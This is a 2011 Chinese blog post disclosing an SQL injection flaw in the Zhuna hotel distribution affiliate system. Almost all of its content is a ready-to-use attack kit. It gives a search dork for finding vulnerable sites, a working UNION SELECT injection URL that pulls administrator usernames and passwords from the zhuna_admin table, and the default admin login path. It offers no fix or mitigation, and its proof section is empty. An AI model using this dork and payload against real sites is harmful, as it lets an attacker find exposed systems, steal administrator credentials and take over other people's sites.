住哪网酒店分销联盟系统SQL注入漏洞 | 网赚,网络营销,seo优化和网络安全-骚鱼博客
0

住哪网酒店分销联盟系统SQL注入漏洞

已有 3,796 人阅读此文 - -

发布日期:2011-09.08
发布作者:歌颂

漏洞类型:SQL注入
漏洞描述:住哪网酒店分销联盟系统SQL注入漏洞,直接爆出管理员帐号密码。

Search:inurl:index.php?m=hotelinfo

注入EXP:
http://yunsec.net/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

默认后台:index.php?m=admin/login

漏洞证明:

0
相关文章!